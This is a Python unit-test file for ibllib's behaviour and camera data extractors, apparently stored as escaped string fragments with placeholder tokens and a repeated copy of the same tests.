training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n\n def tearDown(self):\n for f in self.main_path.rglob('_ibl_log.*.log'):\n f.unlink()\n [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.\n is_file()]\n [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()\n ]\n [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.\n is_dir()]\n [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()\n ]\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n di = training_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = training_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': 